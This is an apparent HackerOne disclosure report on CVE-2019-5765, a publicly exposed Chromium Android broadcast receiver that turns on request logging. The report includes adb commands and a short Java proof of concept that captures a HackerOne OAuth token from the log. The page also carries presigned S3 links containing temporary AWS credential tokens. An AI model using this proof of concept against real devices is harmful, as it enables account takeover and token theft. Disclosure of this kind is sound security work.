CVE-2019-5765: 1-click HackerOne account takeover on all Android devices
Discovered by bagipro on Chromium

This issue took No information to triage and 1 Days and 0 hours to resolve once triaged.



████████████Hi, this is a story about a technically very simple bug which allowed to dump history from all Chromium embedders (Chromium-based browsers and WebView users). It was disclosed yesterday by Chromium team, that’s why I can now publish details about it.

In December 2018 I suddenly found a bug in Chromium Android core when participated in Samsung bug bounty program and looked for bugs in Samsung Browser. I discovered a publicly registered broadcast receiver (actually there are tons of them in apps from HackerOne scope, but I don’t disclose them due to low impact) in file <a title="https://github.com/chromium/chromium/blob/2d57e5b/content/public/android/java/src/org/chromium/content/browser/TracingControllerAndroidImpl.java#L300&quot; href="/redirect?signature=53144f5e628fd5f35879a8e02a526df9f48feb1e&amp;url=https%3A%2F%2Fgithub.com%2Fchromium%2Fchromium%2Fblob%2F2d57e5b%2Fcontent%2Fpublic%2Fandroid%2Fjava%2Fsrc%2Forg%2Fchromium%2Fcontent%2Fbrowser%2FTracingControllerAndroidImpl.java%23L300" target="_blank" rel="nofollow noopener noreferrer"><span>https://github.com/chromium/chromium/blob/2d57e5b/content/public/android/java/src/org/chromium/content/browser/TracingControllerAndroidImpl.java#L300&lt;/span&gt;&lt;i class="icon-external-link"></i></a>. It activated a profiler (logger of all requests) when received a broadcast with action <code>%app_package%.GPU_PROFILER_START</code>. Then I tried to reproduce it in Chrome Browser and it worked!

<ol> <li>Sent a broadcast from ADB: <code>adb shell am broadcast -a com.android.chrome.GPU_PROFILER_START</code> </li> <li>Loaded a page in Chrome</li> <li>Stopped the profiler <code>adb shell am broadcast -a com.android.chrome.GPU_PROFILER_STOP</code> </li> </ol>

I expected to see useless <code>.hprof</code> file, but when opened I found all URLs and request headers (except cookies) logged here. Then I retried to do the same in PayPal app, and the bug worked too. It appeared that the profiler was registered automatically in all apps.

Since HackerOne uses OAuth for authorization, its users could be under attack too. I think the attack complexity was pretty low using Android Instant Apps, they are activated by default on recent Androids (to observe the behavior, just google <code>vimeo video</code> and click on a video, Vimeo app is launched automatically even if you don’t have it installed on your device).

PoC to abuse a HackerOne account <div class="highlight"><pre class="highlight java"><code><span class="c1">// activates the profiler in Chrome browser</span> <span class="n">sendBroadcast</span><span class="o">(</span><span class="k">new</span> <span class="n">Intent</span><span class="o">(</span><span class="s">&quot;com.android.chrome.GPU_PROFILER_START&quot;</span><span class="o">));</span>

<span class="c1">// opens a page in Chrome, logs will be written automatically</span> <span class="n">startActivity</span><span class="o">(</span><span class="k">new</span> <span class="n">Intent</span><span class="o">(</span><span class="n">Intent</span><span class="o">.</span><span class="na">ACTION_VIEW</span><span class="o">,</span> <span class="n">Uri</span><span class="o">.</span><span class="na">parse</span><span class="o">(</span><span class="s">&quot;https://hackerone.com/hacker_dashboard/my_programs&amp;quot;&lt;/span&gt;&lt;span class="o">)));</span>

<span class="c1">// stops the profiler, delay is 2s to let the page load</span> <span class="k">new</span> <span class="nf">Handler</span><span class="o">().</span><span class="na">postDelayed</span><span class="o">(()</span> <span class="o">-&gt;</span> <span class="n">sendBroadcast</span><span class="o">(</span><span class="k">new</span> <span class="n">Intent</span><span class="o">(</span><span class="s">&quot;com.android.chrome.GPU_PROFILER_STOP&quot;</span><span class="o">)),</span> <span class="mi">2000</span><span class="o">);</span> </code></pre></div> And now you can read the log file (by default it’s written to <code>/sdcard/</code>, but you can control output path by supplying <code>-e file /any/path</code>) and theft leaked HackerOne token<br> <a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="h1_token.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/483/472/0a66eee86f5277d0403fbd086d7730820d225106/h1_token.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAQGK6FURQQVFMZA5D%2F20190701%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20190701T165225Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Security-Token=AgoJb3JpZ2luX2VjEGEaCXVzLXdlc3QtMiJGMEQCIF4QXB9ZlNg6f%2By5ZzXmJKiPasTrb82zo9K91riT8uDqAiB4motQN0UjOsTHS7jxFTyuO5C0JGZSuKuVwHpzLhpvmyrjAwiq%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDAxMzYxOTI3NDg0OSIMW6FQctiEy3CCrdKPKrcD76zE6s0ZNQpVMa6M95XxO8Gt5r36HvH%2BuEuWuJ%2F2xb818BwSAHdMUkVbUeh7RniDLFva4Nx98V37MQevNUoiyaqYlIaAO7nhXow03dgqIGkM5%2BdlHX79nxNlzdAfN8aVCbc3FN%2B111hgb%2F3iozTYxWWdTtVIK91ONDIjJhltQHdCyzr1%2FmSfP88ulg1K4q357LaMXaedZeZtQU8qQOb9b3TKrSR4npvWyilsYMo5f6JrYTWOIXFqrGAMcha7SWxH6TDc9ML%2B0t4UREHViLTX1zgbbiiACajs3bu6Dnd%2Fwn123xXVL0%2FIGeP6qejGhjNqDPS5Sh0%2FYNrIhrS8wDnBAVELdMEgo9C6%2FdYhLCZB74aV5ASiwf4Inl4HsiEwa1N9eDNvb5palVef5swexmT61fAa515mQZy5ktGcz3zQtmj5SHMoFw1WES1wCG1u5yp0fmSl%2BFczH1s90KMrNh2a%2FHiDrvtDAXRJtX6f58Fu%2BHk47T0BdYM4yE9qgjewOZPgXU9lPccVV1IOlo0T609MXsk6T9KbMGeLNDyakTh0a1LGBYgSXXhBT6xh4JFlBJ%2Bve%2BeQyNkZ0TCO6OjoBTq1AUFPQO8KAqg9VPTrAv6fL0NjA8TvXHtmsWK2zjziemsrr3a%2Fxih%2F9QMNMPXrKYmRHlsr0sTYyw39%2FYTv6PunvZJ4YZvohsXu60IJus5HXrVgdL6ELT%2FFLHIP938FmgJK1%2FSV%2F6VZJjgqCq2mYK42qAYywnYcQbmEvlKjYakW%2B32ljT917njsc9S%2BfxnvPonopBhESjh4Vsp29LQcii%2FasJZyIBOzBfcPMTMAfcGg8hgxfACiOe0%3D&amp;amp;X-Amz-Signature=a911c585e09300103d09b8857c346e10fdc595ce7f55f3119abb07d6505953be&quot; data-attachment-type="image/png"><img src="https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/483/472/0a66eee86f5277d0403fbd086d7730820d225106/h1_token.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAQGK6FURQQVFMZA5D%2F20190701%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20190701T165225Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Security-Token=AgoJb3JpZ2luX2VjEGEaCXVzLXdlc3QtMiJGMEQCIF4QXB9ZlNg6f%2By5ZzXmJKiPasTrb82zo9K91riT8uDqAiB4motQN0UjOsTHS7jxFTyuO5C0JGZSuKuVwHpzLhpvmyrjAwiq%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDAxMzYxOTI3NDg0OSIMW6FQctiEy3CCrdKPKrcD76zE6s0ZNQpVMa6M95XxO8Gt5r36HvH%2BuEuWuJ%2F2xb818BwSAHdMUkVbUeh7RniDLFva4Nx98V37MQevNUoiyaqYlIaAO7nhXow03dgqIGkM5%2BdlHX79nxNlzdAfN8aVCbc3FN%2B111hgb%2F3iozTYxWWdTtVIK91ONDIjJhltQHdCyzr1%2FmSfP88ulg1K4q357LaMXaedZeZtQU8qQOb9b3TKrSR4npvWyilsYMo5f6JrYTWOIXFqrGAMcha7SWxH6TDc9ML%2B0t4UREHViLTX1zgbbiiACajs3bu6Dnd%2Fwn123xXVL0%2FIGeP6qejGhjNqDPS5Sh0%2FYNrIhrS8wDnBAVELdMEgo9C6%2FdYhLCZB74aV5ASiwf4Inl4HsiEwa1N9eDNvb5palVef5swexmT61fAa515mQZy5ktGcz3zQtmj5SHMoFw1WES1wCG1u5yp0fmSl%2BFczH1s90KMrNh2a%2FHiDrvtDAXRJtX6f58Fu%2BHk47T0BdYM4yE9qgjewOZPgXU9lPccVV1IOlo0T609MXsk6T9KbMGeLNDyakTh0a1LGBYgSXXhBT6xh4JFlBJ%2Bve%2BeQyNkZ0TCO6OjoBTq1AUFPQO8KAqg9VPTrAv6fL0NjA8TvXHtmsWK2zjziemsrr3a%2Fxih%2F9QMNMPXrKYmRHlsr0sTYyw39%2FYTv6PunvZJ4YZvohsXu60IJus5HXrVgdL6ELT%2FFLHIP938FmgJK1%2FSV%2F6VZJjgqCq2mYK42qAYywnYcQbmEvlKjYakW%2B32ljT917njsc9S%2BfxnvPonopBhESjh4Vsp29LQcii%2FasJZyIBOzBfcPMTMAfcGg8hgxfACiOe0%3D&amp;amp;X-Amz-Signature=a911c585e09300103d09b8857c346e10fdc595ce7f55f3119abb07d6505953be&quot; class="markdown-inline-image"></a>

Links:

<ul> <li><a title="https://www.wired.com/story/android-vulnerability-five-years-fragmentation/&quot; href="/redirect?signature=ebf6fc1dea0452ae05564efe36e4c6b16945ec52&amp;url=https%3A%2F%2Fwww.wired.com%2Fstory%2Fandroid-vulnerability-five-years-fragmentation%2F" target="_blank" rel="nofollow noopener noreferrer"><span>https://www.wired.com/story/android-vulnerability-five-years-fragmentation/&lt;/span&gt;&lt;i class="icon-external-link"></i></a></li> <li><a title="https://www.theregister.co.uk/2019/03/20/google_android_browser_vulnerability/&quot; href="/redirect?signature=82964cc7d9955a0c792cb77d054ddaa762d9e976&amp;url=https%3A%2F%2Fwww.theregister.co.uk%2F2019%2F03%2F20%2Fgoogle_android_browser_vulnerability%2F" target="_blank" rel="nofollow noopener noreferrer"><span>https://www.theregister.co.uk/2019/03/20/google_android_browser_vulnerability/&lt;/span&gt;&lt;i class="icon-external-link"></i></a></li> </ul>